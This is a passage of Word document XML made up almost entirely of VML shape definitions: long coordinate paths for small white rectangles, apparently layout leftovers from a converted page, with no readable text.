2680,5377,2680,5375,2680,5374,2680,5373,2680,5372,2680,5370,2680,5369,2680,5367,2680,5366,2680,5364,2680,5362,2680,5361,2680,5359,2680,5357,2680,5355,2680,5353,2680,5351,2680,5349,2680,5347,2680,5345,2680,5343,2680,5340,2680,5338,2680,5335,2680,5333,2680,5330,2680,5328,2680,5325,2680,5322,2680,5319,2680,5316,2680,5313,2680,5310,2680,5307,2680,5304,2680,5300,2680,5297,2680,5294,2680,5290,2680,5286,2680,5283,2680,5279,2680,5275,2680,5271,2680,5267,2680,5263,2680,5259,2680,5254,2680,5250,2680,5245,2680,5241,2680,5236,2680,5231,2680,5226,2680,5221,2680,5216,2680,5211,2680,5206,2680,5201,2680,5195,2680,5190,2680,5184,2680,5178,2680,5172,2680,5166,2680,5160,2680,5154,2680,5148,2680,5142e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:288.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,5770" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:5770;width:130;height:270" coordorigin="2670,5770" coordsize="130,270" path="m2680,5787l2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2680,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2681,5787,2682,5787,2682,5787,2682,5787,2682,5787,2682,5787,2682,5787,2683,5787,2683,5787,2683,5787,2683,5787,2684,5787,2684,5787,2684,5787,2685,5787,2685,5787,2685,5787,2686,5787,2686,5787,2686,5787,2687,5787,2687,5787,2688,5787,2688,5787,2689,5787,2689,5787,2690,5787,2690,5787,2691,5787,2692,5787,2692,5787,2693,5787,2694,5787,2694,5787,2695,5787,2696,5787,2697,5787,2697,5787,2698,5787,2699,5787,2700,5787,2701,5787,2702,5787,2703,5787,2704,5787,2705,5787,2706,5787,2707,5787,2708,5787,2709,5787,2710,5787,2712,5787,2713,5787,2714,5787,2715,5787,2717,5787,2718,5787,2720,5787,2721,5787,2723,5787,2724,5787,2726,5787,2727,5787,2729,5787,2731,5787,2732,5787,2734,5787,2736,5787,2738,5787,2740,5787,2741,5787,2743,5787,2745,5787,2747,5787,2749,5787,2752,5787,2754,5787,2756,5787,2758,5787,2760,5787,2763,5787,2765,5787,2768,5787,2770,5787,2773,5787,2775,5787,2778,5787,2780,5787,2783,5787,2786,5787,2789,5787,2792,5787,2794,5787,2797,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5787,2800,5788,2800,5788,2800,5788,2800,5788,2800,5788,2800,5788,2800,5789,2800,5789,2800,5789,2800,5789,2800,5790,2800,5790,2800,5790,2800,5791,2800,5791,2800,5791,2800,5792,2800,5792,2800,5793,2800,5793,2800,5794,2800,5795,2800,5795,2800,5796,2800,5797,2800,5797,2800,5798,2800,5799,2800,5800,2800,5801,2800,5802,2800,5803,2800,5804,2800,5805,2800,5806,2800,5807,2800,5808,2800,5809,2800,5811,2800,5812,2800,5814,2800,5815,2800,5816,2800,5818,2800,5820,2800,5821,2800,5823,2800,5825,2800,5827,2800,5828,2800,5830,2800,5832,2800,5835,2800,5837,2800,5839,2800,5841,2800,5843,2800,5846,2800,5848,2800,5851,2800,5853,2800,5856,2800,5859,2800,5862,2800,5864,2800,5867,2800,5870,2800,5873,2800,5877,2800,5880,2800,5883,2800,5887,2800,5890,2800,5894,2800,5897,2800,5901,2800,5905,2800,5909,2800,5913,2800,5917,2800,5921,2800,5925,2800,5929,2800,5934,2800,5938,2800,5943,2800,5948,2800,5952,2800,5957,2800,5962,2800,5967,2800,5972,2800,5978,2800,5983,2800,5988,2800,5994,2800,6000,2800,6005,2800,6011,2800,6017,2800,6023,2800,6029,2800,6036,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2800,6042,2799,6042,2799,6042,2799,6042,2799,6042,2799,6042,2799,6042,2798,6042,2798,6042,2798,6042,2798,6042,2798,6042,2797,6042,2797,6042,2797,6042,2797,6042,2796,6042,2796,6042,2795,6042,2795,6042,2795,6042,2794,6042,2794,6042,2793,6042,2793,6042,2793,6042,2792,6042,2792,6042,2791,6042,2790,6042,2790,6042,2789,6042,2789,6042,2788,6042,2787,6042,2787,6042,2786,6042,2785,6042,2784,6042,2783,6042,2783,6042,2782,6042,2781,6042,2780,6042,2779,6042,2778,6042,2777,6042,2776,6042,2775,6042,2774,6042,2773,6042,2772,6042,2770,6042,2769,6042,2768,6042,2767,6042,2765,6042,2764,6042,2763,6042,2761,6042,2760,6042,2758,6042,2757,6042,2755,6042,2753,6042,2752,6042,2750,6042,2748,6042,2747,6042,2745,6042,2743,6042,2741,6042,2739,6042,2737,6042,2735,6042,2733,6042,2731,6042,2729,6042,2727,6042,2725,6042,2723,6042,2720,6042,2718,6042,2716,6042,2713,6042,2711,6042,2708,6042,2706,6042,2703,6042,2700,6042,2698,6042,2695,6042,2692,6042,2689,6042,2686,6042,2683,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6042,2680,6041,2680,6041,2680,6041,2680,6041,2680,6041,2680,6041,2680,6040,2680,6040,2680,6040,2680,6040,2680,6039,2680,6039,2680,6039,2680,6038,2680,6038,2680,6038,2680,6037,2680,6037,2680,6036,2680,6036,2680,6035,2680,6034,2680,6034,2680,6033,2680,6032,2680,6032,2680,6031,2680,6030,2680,6029,2680,6028,2680,6027,2680,6026,2680,6025,2680,6024,2680,6023,2680,6022,2680,6021,2680,6020,2680,6018,2680,6017,2680,6015,2680,6014,2680,6013,2680,6011,2680,6009,2680,6008,2680,6006,2680,6004,2680,6002,2680,6000,2680,5999,2680,5997,2680,5994,2680,5992,2680,5990,2680,5988,2680,5986,2680,5983,2680,5981,2680,5978,2680,5976,2680,5973,2680,5970,2680,5967,2680,5965,2680,5962,2680,5959,2680,5955,2680,5952,2680,5949,2680,5946,2680,5942,2680,5939,2680,5935,2680,5932,2680,5928,2680,5924,2680,5920,2680,5916,2680,5912,2680,5908,2680,5904,2680,5900,2680,5895,2680,5891,2680,5886,2680,5881,2680,5877,2680,5872,2680,5867,2680,5862,2680,5857,2680,5851,2680,5846,2680,5841,2680,5835,2680,5829,2680,5824,2680,5818,2680,5812,2680,5806,2680,5800,2680,5793,2680,5787e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:319.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,6390" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:6390;width:130;height:270" coordorigin="2670,6390" coordsize="130,270" path="m2680,6417l2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2680,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2681,6417,2682,6417,2682,6417,2682,6417,2682,6417,2682,6417,2682,6417,2683,6417,2683,6417,2683,6417,2683,6417,2684,6417,2684,6417,2684,6417,2685,6417,2685,6417,2685,6417,2686,6417,2686,6417,2686,6417,2687,6417,2687,6417,2688,6417,2688,6417,2689,6417,2689,6417,2690,6417,2690,6417,2691,6417,2692,6417,2692,6417,2693,6417,2694,6417,2694,6417,2695,6417,2696,6417,2697,6417,2697,6417,2698,6417,2699,6417,2700,6417,2701,6417,2702,6417,2703,6417,2704,6417,2705,6417,2706,6417,2707,6417,2708,6417,2709,6417,2710,6417,2712,6417,2713,6417,2714,6417,2715,6417,2717,6417,2718,6417,2720,6417,2721,6417,2723,6417,2724,6417,2726,6417,2727,6417,2729,6417,2731,6417,2732,6417,2734,6417,2736,6417,2738,6417,2740,6417,2741,6417,2743,6417,2745,6417,2747,6417,2749,6417,2752,6417,2754,6417,2756,6417,2758,6417,2760,6417,2763,6417,2765,6417,2768,6417,2770,6417,2773,6417,2775,6417,2778,6417,2780,6417,2783,6417,2786,6417,2789,6417,2792,6417,2794,6417,2797,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6417,2800,6418,2800,6418,2800,6418,2800,6418,2800,6418,2800,6418,2800,6418,2800,6418,2800,6419,2800,6419,2800,6419,2800,6419,2800,6420,2800,6420,2800,6420,2800,6421,2800,6421,2800,6421,2800,6422,2800,6422,2800,6423,2800,6423,2800,6424,2800,6424,2800,6425,2800,6426,2800,6426,2800,6427,2800,6428,2800,6428,2800,6429,2800,6430,2800,6431,2800,6432,2800,6433,2800,6434,2800,6435,2800,6436,2800,6437,2800,6439,2800,6440,2800,6441,2800,6442,2800,6444,2800,6445,2800,6447,2800,6448,2800,6450,2800,6452,2800,6453,2800,6455,2800,6457,2800,6459,2800,6461,2800,6463,2800,6465,2800,6467,2800,6469,2800,6471,2800,6474,2800,6476,2800,6479,2800,6481,2800,6484,2800,6486,2800,6489,2800,6492,2800,6495,2800,6498,2800,6501,2800,6504,2800,6507,2800,6510,2800,6514,2800,6517,2800,6520,2800,6524,2800,6528,2800,6531,2800,6535,2800,6539,2800,6543,2800,6547,2800,6551,2800,6555,2800,6560,2800,6564,2800,6569,2800,6573,2800,6578,2800,6583,2800,6588,2800,6592,2800,6598,2800,6603,2800,6608,2800,6613,2800,6619,2800,6624,2800,6630,2800,6636,2800,6642,2800,6647,2800,6654,2800,6660,2800,6666,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2800,6672,2799,6672,2799,6672,2799,6672,2799,6672,2799,6672,2799,6672,2798,6672,2798,6672,2798,6672,2798,6672,2798,6672,2797,6672,2797,6672,2797,6672,2797,6672,2796,6672,2796,6672,2795,6672,2795,6672,2795,6672,2794,6672,2794,6672,2793,6672,2793,6672,2793,6672,2792,6672,2792,6672,2791,6672,2790,6672,2790,6672,2789,6672,2789,6672,2788,6672,2787,6672,2787,6672,2786,6672,2785,6672,2784,6672,2783,6672,2783,6672,2782,6672,2781,6672,2780,6672,2779,6672,2778,6672,2777,6672,2776,6672,2775,6672,2774,6672,2773,6672,2772,6672,2770,6672,2769,6672,2768,6672,2767,6672,2765,6672,2764,6672,2763,6672,2761,6672,2760,6672,2758,6672,2757,6672,2755,6672,2753,6672,2752,6672,2750,6672,2748,6672,2747,6672,2745,6672,2743,6672,2741,6672,2739,6672,2737,6672,2735,6672,2733,6672,2731,6672,2729,6672,2727,6672,2725,6672,2723,6672,2720,6672,2718,6672,2716,6672,2713,6672,2711,6672,2708,6672,2706,6672,2703,6672,2700,6672,2698,6672,2695,6672,2692,6672,2689,6672,2686,6672,2683,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6672,2680,6671,2680,6671,2680,6671,2680,6671,2680,6671,2680,6671,2680,6670,2680,6670,2680,6670,2680,6669,2680,6669,2680,6669,2680,6668,2680,6668,2680,6667,2680,6667,2680,6666,2680,6666,2680,6665,2680,6665,2680,6664,2680,6663,2680,6663,2680,6662,2680,6661,2680,6660,2680,6659,2680,6659,2680,6658,2680,6657,2680,6656,2680,6655,2680,6653,2680,6652,2680,6651,2680,6650,2680,6649,2680,6647,2680,6646,2680,6644,2680,6643,2680,6641,2680,6640,2680,6638,2680,6636,2680,6635,2680,6633,2680,6631,2680,6629,2680,6627,2680,6625,2680,6623,2680,6620,2680,6618,2680,6616,2680,6613,2680,6611,2680,6608,2680,6606,2680,6603,2680,6601,2680,6598,2680,6595,2680,6592,2680,6589,2680,6586,2680,6583,2680,6579,2680,6576,2680,6573,2680,6569,2680,6566,2680,6562,2680,6558,2680,6554,2680,6551,2680,6547,2680,6543,2680,6538,2680,6534,2680,6530,2680,6525,2680,6521,2680,6516,2680,6512,2680,6507,2680,6502,2680,6497,2680,6492,2680,6487,2680,6482,2680,6476,2680,6471,2680,6465,2680,6460,2680,6454,2680,6448,2680,6442,2680,6436,2680,6430,2680,6424,2680,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:352.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,7050" coordsize="130,250">
        <v:shape style="position:absolute;left:2670;top:7050;width:130;height:250" coordorigin="2670,7050" coordsize="130,250" path="m2680,7063l2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2680,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2681,7063,2682,7063,2682,7063,2682,7063,2682,7063,2682,7063,2682,7063,2683,7063,2683,7063,2683,7063,2683,7063,2684,7063,2684,7063,2684,7063,2685,7063,2685,7063,2685,7063,2686,7063,2686,7063,2686,7063,2687,7063,2687,7063,2688,7063,2688,7063,2689,7063,2689,7063,2690,7063,2690,7063,2691,7063,2692,7063,2692,7063,2693,7063,2694,7063,2694,7063,2695,7063,2696,7063,2697,7063,2697,7063,2698,7063,2699,7063,2700,7063,2701,7063,2702,7063,2703,7063,2704,7063,2705,7063,2706,7063,2707,7063,2708,7063,2709,7063,2710,7063,2712,7063,2713,7063,2714,7063,2715,7063,2717,7063,2718,7063,2720,7063,2721,7063,2723,7063,2724,7063,2726,7063,2727,7063,2729,7063,2731,7063,2732,7063,2734,7063,2736,7063,2738,7063,2740,7063,2741,7063,2743,7063,2745,7063,2747,7063,2749,7063,2752,7063,2754,7063,2756,7063,2758,7063,2760,7063,2763,7063,2765,7063,2768,7063,2770,7063,2773,7063,2775,7063,2778,7063,2780,7063,2783,7063,2786,7063,2789,7063,2792,7063,2794,7063,2797,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7063,2800,7064,2800,7064,2800,7064,2800,7064,2800,7064,2800,7065,2800,7065,2800,7065,2800,7066,2800,7066,2800,7066,2800,7067,2800,7067,2800,7068,2800,7068,2800,7069,2800,7069,2800,7070,2800,7070,2800,7071,2800,7072,2800,7072,2800,7073,2800,7074,2800,7075,2800,7075,2800,7076,2800,7077,2800,7078,2800,7079,2800,7080,2800,7081,2800,7083,2800,7084,2800,7085,2800,7086,2800,7088,2800,7089,2800,7091,2800,7092,2800,7094,2800,7095,2800,7097,2800,7099,2800,7100,2800,7102,2800,7104,2800,7106,2800,7108,2800,7110,2800,7112,2800,7114,2800,7117,2800,7119,2800,7121,2800,7124,2800,7126,2800,7129,2800,7132,2800,7134,2800,7137,2800,7140,2800,7143,2800,7146,2800,7149,2800,7152,2800,7156,2800,7159,2800,7162,2800,7166,2800,7169,2800,7173,2800,7177,2800,7180,2800,7184,2800,7188,2800,7192,2800,7197,2800,7201,2800,7205,2800,7209,2800,7214,2800,7219,2800,7223,2800,7228,2800,7233,2800,7238,2800,7243,2800,7248,2800,7253,2800,7259,2800,7264,2800,7270,2800,7275,2800,7281,2800,7287,2800,7293,2800,7299,2800,7305,2800,7311,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2800,7318,2799,7318,2799,7318,2799,7318,2799,7318,2799,7318,2799,7318,2798,7318,2798,7318,2798,7318,2798,7318,2798,7318,2797,7318,2797,7318,2797,7318,2797,7318,2796,7318,2796,7318,2795,7318,2795,7318,2795,7318,2794,7318,2794,7318,2793,7318,2793,7318,2793,7318,2792,7318,2792,7318,2791,7318,2790,7318,2790,7318,2789,7318,2789,7318,2788,7318,2787,7318,2787,7318,2786,7318,2785,7318,2784,7318,2783,7318,2783,7318,2782,7318,2781,7318,2780,7318,2779,7318,2778,7318,2777,7318,2776,7318,2775,7318,2774,7318,2773,7318,2772,7318,2770,7318,2769,7318,2768,7318,2767,7318,2765,7318,2764,7318,2763,7318,2761,7318,2760,7318,2758,7318,2757,7318,2755,7318,2753,7318,2752,7318,2750,7318,2748,7318,2747,7318,2745,7318,2743,7318,2741,7318,2739,7318,2737,7318,2735,7318,2733,7318,2731,7318,2729,7318,2727,7318,2725,7318,2723,7318,2720,7318,2718,7318,2716,7318,2713,7318,2711,7318,2708,7318,2706,7318,2703,7318,2700,7318,2698,7318,2695,7318,2692,7318,2689,7318,2686,7318,2683,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7318,2680,7317,2680,7317,2680,7317,2680,7317,2680,7317,2680,7317,2680,7317,2680,7317,2680,7317,2680,7316,2680,7316,2680,7316,2680,7316,2680,7316,2680,7315,2680,7315,2680,7315,2680,7314,2680,7314,2680,7314,2680,7313,2680,7313,2680,7312,2680,7312,2680,7311,2680,7311,2680,7310,2680,7309,2680,7309,2680,7308,2680,7307,2680,7306,2680,7306,2680,7305,2680,7304,2680,7303,2680,7302,2680,7301,2680,7300,2680,7299,2680,7298,2680,7296,2680,7295,2680,7294,2680,7292,2680,7291,2680,7290,2680,7288,2680,7287,2680,7285,2680,7283,2680,7282,2680,7280,2680,7278,2680,7276,2680,7274,2680,7272,2680,7270,2680,7268,2680,7266,2680,7263,2680,7261,2680,7259,2680,7256,2680,7254,2680,7251,2680,7249,2680,7246,2680,7243,2680,7240,2680,7237,2680,7234,2680,7231,2680,7228,2680,7225,2680,7221,2680,7218,2680,7215,2680,7211,2680,7207,2680,7204,2680,7200,2680,7196,2680,7192,2680,7188,2680,7184,2680,7180,2680,7175,2680,7171,2680,7166,2680,7162,2680,7157,2680,7152,2680,7147,2680,7142,2680,7137,2680,7132,2680,7127,2680,7122,2680,7116,2680,7111,2680,7105,2680,7099,2680,7093,2680,7087,2680,7081,2680,7075,2680,7069,2680,7063e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:383.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,7670" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:7670;width:130;height:270" coordorigin="2670,7670" coordsize="130,270" path="m2680,7693l2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2680,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2681,7693,2682,7693,2682,7693,2682,7693,2682,7693,2682,7693,2682,7693,2683,7693,2683,7693,2683,7693,2683,7693,2684,7693,2684,7693,2684,7693,2685,7693,2685,7693,2685,7693,2686,7693,2686,7693,2686,7693,2687,7693,2687,7693,2688,7693,2688,7693,2689,7693,2689,7693,2690,7693,2690,7693,2691,7693,2692,7693,2692,7693,2693,7693,2694,7693,2694,7693,2695,7693,2696,7693,2697,7693,2697,7693,2698,7693,2699,7693,2700,7693,2701,7693,2702,7693,2703,7693,2704,7693,2705,7693,2706,7693,2707,7693,2708,7693,2709,7693,2710,7693,2712,7693,2713,7693,2714,7693,2715,7693,2717,7693,2718,7693,2720,7693,2721,7693,2723,7693,2724,7693,2726,7693,2727,7693,2729,7693,2731,7693,2732,7693,2734,7693,2736,7693,2738,7693,2740,7693,2741,7693,2743,7693,2745,7693,2747,7693,2749,7693,2752,7693,2754,7693,2756,7693,2758,7693,2760,7693,2763,7693,2765,7693,2768,7693,2770,7693,2773,7693,2775,7693,2778,7693,2780,7693,2783,7693,2786,7693,2789,7693,2792,7693,2794,7693,2797,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7693,2800,7694,2800,7694,2800,7694,2800,7694,2800,7694,2800,7694,2800,7695,2800,7695,2800,7695,2800,7696,2800,7696,2800,7696,2800,7697,2800,7697,2800,7697,2800,7698,2800,7698,2800,7699,2800,7699,2800,7700,2800,7701,2800,7701,2800,7702,2800,7703,2800,7703,2800,7704,2800,7705,2800,7706,2800,7707,2800,7708,2800,7709,2800,7710,2800,7711,2800,7712,2800,7713,2800,7714,2800,7715,2800,7717,2800,7718,2800,7719,2800,7721,2800,7722,2800,7724,2800,7726,2800,7727,2800,7729,2800,7731,2800,7733,2800,7734,2800,7736,2800,7738,2800,7740,2800,7743,2800,7745,2800,7747,2800,7749,2800,7752,2800,7754,2800,7757,2800,7759,2800,7762,2800,7765,2800,7768,2800,7770,2800,7773,2800,7776,2800,7779,2800,7783,2800,7786,2800,7789,2800,7793,2800,7796,2800,7800,2800,7803,2800,7807,2800,7811,2800,7815,2800,7819,2800,7823,2800,7827,2800,7831,2800,7835,2800,7840,2800,7844,2800,7849,2800,7854,2800,7858,2800,7863,2800,7868,2800,7873,2800,7878,2800,7884,2800,7889,2800,7894,2800,7900,2800,7906,2800,7911,2800,7917,2800,7923,2800,7929,2800,7935,2800,7942,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2800,7948,2799,7948,2799,7948,2799,7948,2799,7948,2799,7948,2799,7948,2798,7948,2798,7948,2798,7948,2798,7948,2798,7948,2797,7948,2797,7948,2797,7948,2797,7948,2796,7948,2796,7948,2795,7948,2795,7948,2795,7948,2794,7948,2794,7948,2793,7948,2793,7948,2793,7948,2792,7948,2792,7948,2791,7948,2790,7948,2790,7948,2789,7948,2789,7948,2788,7948,2787,7948,2787,7948,2786,7948,2785,7948,2784,7948,2783,7948,2783,7948,2782,7948,2781,7948,2780,7948,2779,7948,2778,7948,2777,7948,2776,7948,2775,7948,2774,7948,2773,7948,2772,7948,2770,7948,2769,7948,2768,7948,2767,7948,2765,7948,2764,7948,2763,7948,2761,7948,2760,7948,2758,7948,2757,7948,2755,7948,2753,7948,2752,7948,2750,7948,2748,7948,2747,7948,2745,7948,2743,7948,2741,7948,2739,7948,2737,7948,2735,7948,2733,7948,2731,7948,2729,7948,2727,7948,2725,7948,2723,7948,2720,7948,2718,7948,2716,7948,2713,7948,2711,7948,2708,7948,2706,7948,2703,7948,2700,7948,2698,7948,2695,7948,2692,7948,2689,7948,2686,7948,2683,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7948,2680,7947,2680,7947,2680,7947,2680,7947,2680,7947,2680,7947,2680,7947,2680,7946,2680,7946,2680,7946,2680,7946,2680,7945,2680,7945,2680,7945,2680,7944,2680,7944,2680,7943,2680,7943,2680,7943,2680,7942,2680,7942,2680,7941,2680,7940,2680,7940,2680,7939,2680,7938,2680,7938,2680,7937,2680,7936,2680,7935,2680,7934,2680,7933,2680,7932,2680,7931,2680,7930,2680,7929,2680,7928,2680,7927,2680,7925,2680,7924,2680,7923,2680,7921,2680,7920,2680,7918,2680,7917,2680,7915,2680,7914,2680,7912,2680,7910,2680,7908,2680,7906,2680,7904,2680,7902,2680,7900,2680,7898,2680,7896,2680,7894,2680,7891,2680,7889,2680,7887,2680,7884,2680,7882,2680,7879,2680,7876,2680,7873,2680,7870,2680,7868,2680,7865,2680,7861,2680,7858,2680,7855,2680,7852,2680,7848,2680,7845,2680,7841,2680,7838,2680,7834,2680,7830,2680,7826,2680,7822,2680,7818,2680,7814,2680,7810,2680,7806,2680,7801,2680,7797,2680,7792,2680,7787,2680,7783,2680,7778,2680,7773,2680,7768,2680,7763,2680,7757,2680,7752,2680,7746,2680,7741,2680,7735,2680,7730,2680,7724,2680,7718,2680,7712,2680,7706,2680,7699,2680,7693e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:415.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,8310" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:8310;width:130;height:270" coordorigin="2670,8310" coordsize="130,270" path="m2680,8338l2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2682,8338,2682,8338,2682,8338,2682,8338,2682,8338,2682,8338,2683,8338,2683,8338,2683,8338,2683,8338,2684,8338,2684,8338,2684,8338,2685,8338,2685,8338,2685,8338,2686,8338,2686,8338,2686,8338,2687,8338,2687,8338,2688,8338,2688,8338,2689,8338,2689,8338,2690,8338,2690,8338,2691,8338,2692,8338,2692,8338,2693,8338,2694,8338,2694,8338,2695,8338,2696,8338,2697,8338,2697,8338,2698,8338,2699,8338,2700,8338,2701,8338,2702,8338,2703,8338,2704,8338,2705,8338,2706,8338,2707,8338,2708,8338,2709,8338,2710,8338,2712,8338,2713,8338,2714,8338,2715,8338,2717,8338,2718,8338,2720,8338,2721,8338,2723,8338,2724,8338,2726,8338,2727,8338,2729,8338,2731,8338,2732,8338,2734,8338,2736,8338,2738,8338,2740,8338,2741,8338,2743,8338,2745,8338,2747,8338,2749,8338,2752,8338,2754,8338,2756,8338,2758,8338,2760,8338,2763,8338,2765,8338,2768,8338,2770,8338,2773,8338,2775,8338,2778,8338,2780,8338,2783,8338,2786,8338,2789,8338,2792,8338,2794,8338,2797,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8339,2800,8339,2800,8339,2800,8339,2800,8339,2800,8339,2800,8339,2800,8339,2800,8340,2800,8340,2800,8340,2800,8340,2800,8341,2800,8341,2800,8341,2800,8342,2800,8342,2800,8342,2800,8343,2800,8343,2800,8344,2800,8344,2800,8345,2800,8345,2800,8346,2800,8347,2800,8347,2800,8348,2800,8349,2800,8349,2800,8350,2800,8351,2800,8352,2800,8353,2800,8354,2800,8355,2800,8356,2800,8357,2800,8358,2800,8359,2800,8361,2800,8362,2800,8363,2800,8365,2800,8366,2800,8368,2800,8369,2800,8371,2800,8373,2800,8374,2800,8376,2800,8378,2800,8380,2800,8382,2800,8384,2800,8386,2800,8388,2800,8390,2800,8392,2800,8395,2800,8397,2800,8400,2800,8402,2800,8405,2800,8407,2800,8410,2800,8413,2800,8416,2800,8419,2800,8422,2800,8425,2800,8428,2800,8431,2800,8434,2800,8438,2800,8441,2800,8445,2800,8449,2800,8452,2800,8456,2800,8460,2800,8464,2800,8468,2800,8472,2800,8476,2800,8481,2800,8485,2800,8490,2800,8494,2800,8499,2800,8504,2800,8509,2800,8513,2800,8519,2800,8524,2800,8529,2800,8534,2800,8540,2800,8545,2800,8551,2800,8557,2800,8563,2800,8568,2800,8575,2800,8581,2800,8587,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2799,8593,2799,8593,2799,8593,2799,8593,2799,8593,2799,8593,2798,8593,2798,8593,2798,8593,2798,8593,2798,8593,2797,8593,2797,8593,2797,8593,2797,8593,2796,8593,2796,8593,2795,8593,2795,8593,2795,8593,2794,8593,2794,8593,2793,8593,2793,8593,2793,8593,2792,8593,2792,8593,2791,8593,2790,8593,2790,8593,2789,8593,2789,8593,2788,8593,2787,8593,2787,8593,2786,8593,2785,8593,2784,8593,2783,8593,2783,8593,2782,8593,2781,8593,2780,8593,2779,8593,2778,8593,2777,8593,2776,8593,2775,8593,2774,8